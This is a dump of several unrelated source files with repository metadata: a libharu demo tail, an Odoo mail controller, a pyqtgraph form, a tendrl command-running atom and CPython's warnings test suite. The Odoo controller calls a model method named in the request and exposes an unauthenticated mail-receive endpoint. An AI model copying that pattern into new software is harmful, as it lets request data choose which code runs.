# clean up
HPDF_Free (pdf)
cp936.close ()
cp932.close ()
return 0
main() | gpl-3.0 |
Jgarcia-IAS/localizacion | openerp/addons-extra/odoo-pruebas/odoo-server/addons/mail/controllers/main.py | 383 | 1733 | import base64
import psycopg2
import openerp
from openerp import SUPERUSER_ID
from openerp import http
from openerp.http import request
from openerp.addons.web.controllers.main import content_disposition
import mimetypes
class MailController(http.Controller):
_cp_path = '/mail'
@http.route('/mail/download_attachment', type='http', auth='user')
def download_attachment(self, model, id, method, attachment_id, **kw):
# FIXME use /web/binary/saveas directly
Model = request.registry.get(model)
res = getattr(Model, method)(request.cr, request.uid, int(id), int(attachment_id))
if res:
filecontent = base64.b64decode(res.get('base64'))
filename = res.get('filename')
content_type = mimetypes.guess_type(filename)
if filecontent and filename:
return request.make_response(
filecontent,
headers=[('Content-Type', content_type[0] or 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))])
return request.not_found()
@http.route('/mail/receive', type='json', auth='none')
def receive(self, req):
""" End-point to receive mail from an external SMTP server. """
dbs = req.jsonrequest.get('databases')
for db in dbs:
message = dbs[db].decode('base64')
try:
registry = openerp.registry(db)
with registry.cursor() as cr:
mail_thread = registry['mail.thread']
mail_thread.message_process(cr, SUPERUSER_ID, None, message)
except psycopg2.Error:
pass
return True
| agpl-3.0 |
phborba/dsgtoolsop | ProfileTool/pyqtgraph/graphicsItems/ViewBox/axisCtrlTemplate_pyqt.py | 38 | 6134 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './pyqtgraph/graphicsItems/ViewBox/axisCtrlTemplate.ui'
#
# Created: Mon Dec 23 10:10:51 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from ...Qt import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(186, 154)
Form.setMaximumSize(QtCore.QSize(200, 16777215))
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setMargin(0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(Form)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 7, 0, 1, 2)
self.linkCombo = QtGui.QComboBox(Form)
self.linkCombo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)
self.linkCombo.setObjectName(_fromUtf8("linkCombo"))
self.gridLayout.addWidget(self.linkCombo, 7, 2, 1, 2)
self.autoPercentSpin = QtGui.QSpinBox(Form)
self.autoPercentSpin.setEnabled(True)
self.autoPercentSpin.setMinimum(1)
self.autoPercentSpin.setMaximum(100)
self.autoPercentSpin.setSingleStep(1)
self.autoPercentSpin.setProperty("value", 100)
self.autoPercentSpin.setObjectName(_fromUtf8("autoPercentSpin"))
self.gridLayout.addWidget(self.autoPercentSpin, 2, 2, 1, 2)
self.autoRadio = QtGui.QRadioButton(Form)
self.autoRadio.setChecked(True)
self.autoRadio.setObjectName(_fromUtf8("autoRadio"))
self.gridLayout.addWidget(self.autoRadio, 2, 0, 1, 2)
self.manualRadio = QtGui.QRadioButton(Form)
self.manualRadio.setObjectName(_fromUtf8("manualRadio"))
self.gridLayout.addWidget(self.manualRadio, 1, 0, 1, 2)
self.minText = QtGui.QLineEdit(Form)
self.minText.setObjectName(_fromUtf8("minText"))
self.gridLayout.addWidget(self.minText, 1, 2, 1, 1)
self.maxText = QtGui.QLineEdit(Form)
self.maxText.setObjectName(_fromUtf8("maxText"))
self.gridLayout.addWidget(self.maxText, 1, 3, 1, 1)
self.invertCheck = QtGui.QCheckBox(Form)
self.invertCheck.setObjectName(_fromUtf8("invertCheck"))
self.gridLayout.addWidget(self.invertCheck, 5, 0, 1, 4)
self.mouseCheck = QtGui.QCheckBox(Form)
self.mouseCheck.setChecked(True)
self.mouseCheck.setObjectName(_fromUtf8("mouseCheck"))
self.gridLayout.addWidget(self.mouseCheck, 6, 0, 1, 4)
self.visibleOnlyCheck = QtGui.QCheckBox(Form)
self.visibleOnlyCheck.setObjectName(_fromUtf8("visibleOnlyCheck"))
self.gridLayout.addWidget(self.visibleOnlyCheck, 3, 2, 1, 2)
self.autoPanCheck = QtGui.QCheckBox(Form)
self.autoPanCheck.setObjectName(_fromUtf8("autoPanCheck"))
self.gridLayout.addWidget(self.autoPanCheck, 4, 2, 1, 2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.label.setText(_translate("Form", "Link Axis:", None))
self.linkCombo.setToolTip(_translate("Form", "<html><head/><body><p>Links this axis with another view. When linked, both views will display the same data range.</p></body></html>", None))
self.autoPercentSpin.setToolTip(_translate("Form", "<html><head/><body><p>Percent of data to be visible when auto-scaling. It may be useful to decrease this value for data with spiky noise.</p></body></html>", None))
self.autoPercentSpin.setSuffix(_translate("Form", "%", None))
self.autoRadio.setToolTip(_translate("Form", "<html><head/><body><p>Automatically resize this axis whenever the displayed data is changed.</p></body></html>", None))
self.autoRadio.setText(_translate("Form", "Auto", None))
self.manualRadio.setToolTip(_translate("Form", "<html><head/><body><p>Set the range for this axis manually. This disables automatic scaling. </p></body></html>", None))
self.manualRadio.setText(_translate("Form", "Manual", None))
self.minText.setToolTip(_translate("Form", "<html><head/><body><p>Minimum value to display for this axis.</p></body></html>", None))
self.minText.setText(_translate("Form", "0", None))
self.maxText.setToolTip(_translate("Form", "<html><head/><body><p>Maximum value to display for this axis.</p></body></html>", None))
self.maxText.setText(_translate("Form", "0", None))
self.invertCheck.setToolTip(_translate("Form", "<html><head/><body><p>Inverts the display of this axis. (+y points downward instead of upward)</p></body></html>", None))
self.invertCheck.setText(_translate("Form", "Invert Axis", None))
self.mouseCheck.setToolTip(_translate("Form", "<html><head/><body><p>Enables mouse interaction (panning, scaling) for this axis.</p></body></html>", None))
self.mouseCheck.setText(_translate("Form", "Mouse Enabled", None))
self.visibleOnlyCheck.setToolTip(_translate("Form", "<html><head/><body><p>When checked, the axis will only auto-scale to data that is visible along the orthogonal axis.</p></body></html>", None))
self.visibleOnlyCheck.setText(_translate("Form", "Visible Data Only", None))
self.autoPanCheck.setToolTip(_translate("Form", "<html><head/><body><p>When checked, the axis will automatically pan to center on the current data, but the scale along this axis will not change.</p></body></html>", None))
self.autoPanCheck.setText(_translate("Form", "Auto Pan Only", None))
| gpl-2.0 |
r0h4n/commons | tendrl/commons/objects/node/atoms/cmd/__init__.py | 2 | 1493 | from tendrl.commons.objects import AtomExecutionFailedError
from tendrl.commons.objects import BaseAtom
from tendrl.commons.utils.cmd_utils import Command
from tendrl.commons.utils import log_utils as logger
class Cmd(BaseAtom):
def run(self):
cmd = self.parameters.get("Node.cmd_str")
logger.log(
"info",
NS.publisher_id,
{"message": "Executing %s on node %s" % (
cmd,
self.parameters.get("fqdn"))},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
out, err, rc = Command(cmd).run()
if not err and rc == 0:
logger.log(
"info",
NS.publisher_id,
{"message": "Successfully executed %s on node %s" % (
cmd,
self.parameters.get("fqdn"))},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
return True
else:
logger.log(
"error",
NS.publisher_id,
{"message": "Failed to execute %s on node %s."
"Error %s" % (
cmd,
self.parameters.get("fqdn"),
err)},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
raise AtomExecutionFailedError(err)
| lgpl-2.1 |
dennis-sheil/commandergenius | project/jni/python/src/Lib/test/test_warnings.py | 51 | 27088 | from contextlib import contextmanager
import linecache
import os
import StringIO
import sys
import unittest
from test import test_support
import warning_tests
import warnings as original_warnings
sys.modules['_warnings'] = 0
del sys.modules['warnings']
import warnings as py_warnings
del sys.modules['_warnings']
del sys.modules['warnings']
import warnings as c_warnings
sys.modules['warnings'] = original_warnings
@contextmanager
def warnings_state(module):
"""Use a specific warnings implementation in warning_tests."""
global __warningregistry__
for to_clear in (sys, warning_tests):
try:
to_clear.__warningregistry__.clear()
except AttributeError:
pass
try:
__warningregistry__.clear()
except NameError:
pass
original_warnings = warning_tests.warnings
try:
warning_tests.warnings = module
yield
finally:
warning_tests.warnings = original_warnings
class BaseTest(unittest.TestCase):
"""Basic bookkeeping required for testing."""
def setUp(self):
# The __warningregistry__ needs to be in a pristine state for tests
# to work properly.
if '__warningregistry__' in globals():
del globals()['__warningregistry__']
if hasattr(warning_tests, '__warningregistry__'):
del warning_tests.__warningregistry__
if hasattr(sys, '__warningregistry__'):
del sys.__warningregistry__
# The 'warnings' module must be explicitly set so that the proper
# interaction between _warnings and 'warnings' can be controlled.
sys.modules['warnings'] = self.module
super(BaseTest, self).setUp()
def tearDown(self):
sys.modules['warnings'] = original_warnings
super(BaseTest, self).tearDown()
class FilterTests(object):
"""Testing the filtering functionality."""
def test_error(self):
with original_warnings.catch_warnings(module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("error", category=UserWarning)
self.assertRaises(UserWarning, self.module.warn,
"FilterTests.test_error")
def test_ignore(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("ignore", category=UserWarning)
self.module.warn("FilterTests.test_ignore", UserWarning)
self.assertEquals(len(w), 0)
def test_always(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("always", category=UserWarning)
message = "FilterTests.test_always"
self.module.warn(message, UserWarning)
self.assert_(message, w[-1].message)
self.module.warn(message, UserWarning)
self.assert_(w[-1].message, message)
def test_default(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("default", category=UserWarning)
message = UserWarning("FilterTests.test_default")
for x in xrange(2):
self.module.warn(message, UserWarning)
if x == 0:
self.assertEquals(w[-1].message, message)
del w[:]
elif x == 1:
self.assertEquals(len(w), 0)
else:
raise ValueError("loop variant unhandled")
def test_module(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("module", category=UserWarning)
message = UserWarning("FilterTests.test_module")
self.module.warn(message, UserWarning)
self.assertEquals(w[-1].message, message)
del w[:]
self.module.warn(message, UserWarning)
self.assertEquals(len(w), 0)
def test_once(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("once", category=UserWarning)
message = UserWarning("FilterTests.test_once")
self.module.warn_explicit(message, UserWarning, "test_warnings.py",
42)
self.assertEquals(w[-1].message, message)
del w[:]
self.module.warn_explicit(message, UserWarning, "test_warnings.py",
13)
self.assertEquals(len(w), 0)
self.module.warn_explicit(message, UserWarning, "test_warnings2.py",
42)
self.assertEquals(len(w), 0)
def test_inheritance(self):
with original_warnings.catch_warnings(module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("error", category=Warning)
self.assertRaises(UserWarning, self.module.warn,
"FilterTests.test_inheritance", UserWarning)
def test_ordering(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("ignore", category=UserWarning)
self.module.filterwarnings("error", category=UserWarning,
append=True)
del w[:]
try:
self.module.warn("FilterTests.test_ordering", UserWarning)
except UserWarning:
self.fail("order handling for actions failed")
self.assertEquals(len(w), 0)
def test_filterwarnings(self):
# Test filterwarnings().
# Implicitly also tests resetwarnings().
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.filterwarnings("error", "", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn, 'convert to error')
self.module.resetwarnings()
text = 'handle normally'
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
self.module.filterwarnings("ignore", "", Warning, "", 0)
text = 'filtered out'
self.module.warn(text)
self.assertNotEqual(str(w[-1].message), text)
self.module.resetwarnings()
self.module.filterwarnings("error", "hex*", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn, 'hex/oct')
text = 'nonmatching text'
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
class CFilterTests(BaseTest, FilterTests):
module = c_warnings
class PyFilterTests(BaseTest, FilterTests):
module = py_warnings
class WarnTests(unittest.TestCase):
"""Test warnings.warn() and warnings.warn_explicit()."""
def test_message(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
for i in range(4):
text = 'multi %d' %i # Different text on each call.
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
def test_filename(self):
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam1")
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam2")
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
def test_stacklevel(self):
# Test stacklevel argument
# make sure all messages are different, so the warning won't be skipped
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam3", stacklevel=1)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam4", stacklevel=1)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.inner("spam5", stacklevel=2)
self.assertEqual(os.path.basename(w[-1].filename),
"test_warnings.py")
warning_tests.outer("spam6", stacklevel=2)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam6.5", stacklevel=3)
self.assertEqual(os.path.basename(w[-1].filename),
"test_warnings.py")
warning_tests.inner("spam7", stacklevel=9999)
self.assertEqual(os.path.basename(w[-1].filename),
"sys")
def test_missing_filename_not_main(self):
# If __file__ is not specified and __main__ is not the module name,
# then __file__ should be set to the module name.
filename = warning_tests.__file__
try:
del warning_tests.__file__
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam8", stacklevel=1)
self.assertEqual(w[-1].filename, warning_tests.__name__)
finally:
warning_tests.__file__ = filename
def test_missing_filename_main_with_argv(self):
# If __file__ is not specified and the caller is __main__ and sys.argv
# exists, then use sys.argv[0] as the file.
if not hasattr(sys, 'argv'):
return
filename = warning_tests.__file__
module_name = warning_tests.__name__
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam9', stacklevel=1)
self.assertEqual(w[-1].filename, sys.argv[0])
finally:
warning_tests.__file__ = filename
warning_tests.__name__ = module_name
def test_missing_filename_main_without_argv(self):
# If __file__ is not specified, the caller is __main__, and sys.argv
# is not set, then '__main__' is the file name.
filename = warning_tests.__file__
module_name = warning_tests.__name__
argv = sys.argv
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
del sys.argv
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam10', stacklevel=1)
self.assertEqual(w[-1].filename, '__main__')
finally:
warning_tests.__file__ = filename
warning_tests.__name__ = module_name
sys.argv = argv
def test_missing_filename_main_with_argv_empty_string(self):
# If __file__ is not specified, the caller is __main__, and sys.argv[0]
# is the empty string, then '__main__' is the file name.
# Tests issue 2743.
file_name = warning_tests.__file__
module_name = warning_tests.__name__
argv = sys.argv
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
sys.argv = ['']
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam11', stacklevel=1)
self.assertEqual(w[-1].filename, '__main__')
finally:
warning_tests.__file__ = file_name
warning_tests.__name__ = module_name
sys.argv = argv
def test_warn_explicit_type_errors(self):
# warn_explicit() should error out gracefully if it is given objects
# of the wrong types.
# lineno is expected to be an integer.
self.assertRaises(TypeError, self.module.warn_explicit,
None, UserWarning, None, None)
# Either 'message' needs to be an instance of Warning or 'category'
# needs to be a subclass.
self.assertRaises(TypeError, self.module.warn_explicit,
None, None, None, 1)
# 'registry' must be a dict or None.
self.assertRaises((TypeError, AttributeError),
self.module.warn_explicit,
None, Warning, None, 1, registry=42)
class CWarnTests(BaseTest, WarnTests):
module = c_warnings
class PyWarnTests(BaseTest, WarnTests):
module = py_warnings
class WCmdLineTests(unittest.TestCase):
def test_improper_input(self):
# Uses the private _setoption() function to test the parsing
# of command-line warning arguments
with original_warnings.catch_warnings(module=self.module):
self.assertRaises(self.module._OptionError,
self.module._setoption, '1:2:3:4:5:6')
self.assertRaises(self.module._OptionError,
self.module._setoption, 'bogus::Warning')
self.assertRaises(self.module._OptionError,
self.module._setoption, 'ignore:2::4:-5')
self.module._setoption('error::Warning::0')
self.assertRaises(UserWarning, self.module.warn, 'convert to error')
class CWCmdLineTests(BaseTest, WCmdLineTests):
module = c_warnings
class PyWCmdLineTests(BaseTest, WCmdLineTests):
module = py_warnings
class _WarningsTests(BaseTest):
"""Tests specific to the _warnings module."""
module = c_warnings
def test_filter(self):
# Everything should function even if 'filters' is not in warnings.
with original_warnings.catch_warnings(module=self.module) as w:
self.module.filterwarnings("error", "", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn,
'convert to error')
del self.module.filters
self.assertRaises(UserWarning, self.module.warn,
'convert to error')
def test_onceregistry(self):
# Replacing or removing the onceregistry should be okay.
global __warningregistry__
message = UserWarning('onceregistry test')
try:
original_registry = self.module.onceregistry
__warningregistry__ = {}
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("once", category=UserWarning)
self.module.warn_explicit(message, UserWarning, "file", 42)
self.failUnlessEqual(w[-1].message, message)
del w[:]
self.module.warn_explicit(message, UserWarning, "file", 42)
self.assertEquals(len(w), 0)
# Test the resetting of onceregistry.
self.module.onceregistry = {}
__warningregistry__ = {}
self.module.warn('onceregistry test')
self.failUnlessEqual(w[-1].message.args, message.args)
# Removal of onceregistry is okay.
del w[:]
del self.module.onceregistry
__warningregistry__ = {}
self.module.warn_explicit(message, UserWarning, "file", 42)
self.assertEquals(len(w), 0)
finally:
self.module.onceregistry = original_registry
def test_showwarning_missing(self):
# Test that showwarning() missing is okay.
text = 'del showwarning test'
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("always", category=UserWarning)
del self.module.showwarning
with test_support.captured_output('stderr') as stream:
self.module.warn(text)
result = stream.getvalue()
self.failUnless(text in result)
def test_showwarning_not_callable(self):
self.module.filterwarnings("always", category=UserWarning)
old_showwarning = self.module.showwarning
self.module.showwarning = 23
try:
self.assertRaises(TypeError, self.module.warn, "Warning!")
finally:
self.module.showwarning = old_showwarning
self.module.resetwarnings()
def test_show_warning_output(self):
# With showwarning() missing, make sure that output is okay.
text = 'test show_warning'
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("always", category=UserWarning)
del self.module.showwarning
with test_support.captured_output('stderr') as stream:
warning_tests.inner(text)
result = stream.getvalue()
self.failUnlessEqual(result.count('\n'), 2,
"Too many newlines in %r" % result)
first_line, second_line = result.split('\n', 1)
expected_file = os.path.splitext(warning_tests.__file__)[0] + '.py'
first_line_parts = first_line.rsplit(':', 3)
path, line, warning_class, message = first_line_parts
line = int(line)
self.failUnlessEqual(expected_file, path)
self.failUnlessEqual(warning_class, ' ' + UserWarning.__name__)
self.failUnlessEqual(message, ' ' + text)
expected_line = ' ' + linecache.getline(path, line).strip() + '\n'
assert expected_line
self.failUnlessEqual(second_line, expected_line)
class WarningsDisplayTests(unittest.TestCase):
"""Test the displaying of warnings and the ability to overload functions
related to displaying warnings."""
def test_formatwarning(self):
message = "msg"
category = Warning
file_name = os.path.splitext(warning_tests.__file__)[0] + '.py'
line_num = 3
file_line = linecache.getline(file_name, line_num).strip()
format = "%s:%s: %s: %s\n %s\n"
expect = format % (file_name, line_num, category.__name__, message,
file_line)
self.failUnlessEqual(expect, self.module.formatwarning(message,
category, file_name, line_num))
# Test the 'line' argument.
file_line += " for the win!"
expect = format % (file_name, line_num, category.__name__, message,
file_line)
self.failUnlessEqual(expect, self.module.formatwarning(message,
category, file_name, line_num, file_line))
def test_showwarning(self):
file_name = os.path.splitext(warning_tests.__file__)[0] + '.py'
line_num = 3
expected_file_line = linecache.getline(file_name, line_num).strip()
message = 'msg'
category = Warning
file_object = StringIO.StringIO()
expect = self.module.formatwarning(message, category, file_name,
line_num)
self.module.showwarning(message, category, file_name, line_num,
file_object)
self.failUnlessEqual(file_object.getvalue(), expect)
# Test 'line' argument.
expected_file_line += "for the win!"
expect = self.module.formatwarning(message, category, file_name,
line_num, expected_file_line)
file_object = StringIO.StringIO()
self.module.showwarning(message, category, file_name, line_num,
file_object, expected_file_line)
self.failUnlessEqual(expect, file_object.getvalue())
class CWarningsDisplayTests(BaseTest, WarningsDisplayTests):
module = c_warnings
class PyWarningsDisplayTests(BaseTest, WarningsDisplayTests):
module = py_warnings
class CatchWarningTests(BaseTest):
"""Test catch_warnings()."""
def test_catch_warnings_restore(self):
wmod = self.module
orig_filters = wmod.filters
orig_showwarning = wmod.showwarning
# Ensure both showwarning and filters are restored when recording
with wmod.catch_warnings(module=wmod, record=True):
wmod.filters = wmod.showwarning = object()
self.assert_(wmod.filters is orig_filters)
self.assert_(wmod.showwarning is orig_showwarning)
# Same test, but with recording disabled
with wmod.catch_warnings(module=wmod, record=False):
wmod.filters = wmod.showwarning = object()
self.assert_(wmod.filters is orig_filters)
self.assert_(wmod.showwarning is orig_showwarning)
def test_catch_warnings_recording(self):
wmod = self.module
# Ensure warnings are recorded when requested
with wmod.catch_warnings(module=wmod, record=True) as w:
self.assertEqual(w, [])
self.assert_(type(w) is list)
wmod.simplefilter("always")
wmod.warn("foo")
self.assertEqual(str(w[-1].message), "foo")
wmod.warn("bar")
self.assertEqual(str(w[-1].message), "bar")
self.assertEqual(str(w[0].message), "foo")
self.assertEqual(str(w[1].message), "bar")
del w[:]
self.assertEqual(w, [])
# Ensure warnings are not recorded when not requested
orig_showwarning = wmod.showwarning
with wmod.catch_warnings(module=wmod, record=False) as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
def test_catch_warnings_reentry_guard(self):
wmod = self.module
# Ensure catch_warnings is protected against incorrect usage
x = wmod.catch_warnings(module=wmod, record=True)
self.assertRaises(RuntimeError, x.__exit__)
with x:
self.assertRaises(RuntimeError, x.__enter__)
# Same test, but with recording disabled
x = wmod.catch_warnings(module=wmod, record=False)
self.assertRaises(RuntimeError, x.__exit__)
with x:
self.assertRaises(RuntimeError, x.__enter__)
def test_catch_warnings_defaults(self):
wmod = self.module
orig_filters = wmod.filters
orig_showwarning = wmod.showwarning
# Ensure default behaviour is not to record warnings
with wmod.catch_warnings(module=wmod) as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
self.assert_(wmod.filters is not orig_filters)
self.assert_(wmod.filters is orig_filters)
if wmod is sys.modules['warnings']:
# Ensure the default module is this one
with wmod.catch_warnings() as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
self.assert_(wmod.filters is not orig_filters)
self.assert_(wmod.filters is orig_filters)
def test_check_warnings(self):
# Explicit tests for the test_support convenience wrapper
wmod = self.module
if wmod is sys.modules['warnings']:
with test_support.check_warnings() as w:
self.assertEqual(w.warnings, [])
wmod.simplefilter("always")
wmod.warn("foo")
self.assertEqual(str(w.message), "foo")
wmod.warn("bar")
self.assertEqual(str(w.message), "bar")
self.assertEqual(str(w.warnings[0].message), "foo")
self.assertEqual(str(w.warnings[1].message), "bar")
w.reset()
self.assertEqual(w.warnings, [])
class CCatchWarningTests(CatchWarningTests):
module = c_warnings
class PyCatchWarningTests(CatchWarningTests):
module = py_warnings
class ShowwarningDeprecationTests(BaseTest):
"""Test the deprecation of the old warnings.showwarning() API works."""
@staticmethod
def bad_showwarning(message, category, filename, lineno, file=None):
pass
@staticmethod
def ok_showwarning(*args):
pass
def test_deprecation(self):
# message, category, filename, lineno[, file[, line]]
args = ("message", UserWarning, "file name", 42)
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("error", category=DeprecationWarning)
self.module.showwarning = self.bad_showwarning
self.assertRaises(DeprecationWarning, self.module.warn_explicit,
*args)
self.module.showwarning = self.ok_showwarning
try:
self.module.warn_explicit(*args)
except DeprecationWarning as exc:
self.fail('showwarning(*args) should not trigger a '
'DeprecationWarning')
class CShowwarningDeprecationTests(ShowwarningDeprecationTests):
module = c_warnings
class PyShowwarningDeprecationTests(ShowwarningDeprecationTests):
module = py_warnings
def test_main():
py_warnings.onceregistry.clear()
c_warnings.onceregistry.clear()
test_support.run_unittest(CFilterTests, PyFilterTests,
CWarnTests, PyWarnTests,
CWCmdLineTests, PyWCmdLineTests,
_WarningsTests,
CWarningsDisplayTests, PyWarningsDisplayTests,
CCatchWarningTests, PyCatchWarningTests,
CShowwarningDeprecationTests,
PyShowwarningDeprecationTests,
)
if __name__ == "__main__":
test_main()
| lgpl-2.1 |